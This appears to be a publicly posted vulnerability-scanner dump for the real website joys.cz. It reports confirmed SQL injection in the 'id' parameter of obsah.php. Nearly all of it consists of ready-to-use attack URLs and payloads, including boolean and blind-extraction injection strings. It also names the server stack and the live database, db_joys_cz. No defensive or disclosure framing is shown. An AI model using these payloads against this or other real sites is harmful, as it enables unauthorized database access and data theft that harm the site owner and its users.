sroub3k

joys.cz

May 3rd, 2012
Boolean Based SQL Injection

Severity : Critical
Confirmation : Confirmed
Detection Accuracy :
Vulnerable URL : http://www.joys.cz/obsah.php?lang=cz&id=-1 OR 17-7=10
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: -1 OR 17-7=10

||| [High Possibility] SQL Injection

Severity : Critical
Confirmation : Confirmed
Vulnerable URL : http://www.joys.cz/obsah.php?lang=cz&id=%27
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: %27

||| Database Error Message
Severity : Low
Confirmation : Confirmed
Vulnerable URL : http://www.joys.cz/obsah.php?lang=cz&id=%27
Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: %27

||| MySQL Database Identified

Severity : Information
Confirmation : Confirmed
Vulnerable URL : http://www.joys.cz/obsah.php?lang=cz&id=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--
Vulnerability Classifications: -
Parameter Name: id
Parameter Type: Querystring
Attack Pattern: -1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--

||| Injection ?

links> http://www.joys.cz/obsah.php?lang=cz&id=-1 OR 1=1 AND 1
links> http://www.joys.cz/obsah.php?lang=cz&id=-1 OR 17-7=10

Web Server: Apache
Powered-by: PHP/5.2.5
DB Server: MySQL
Current DB: db_joys_cz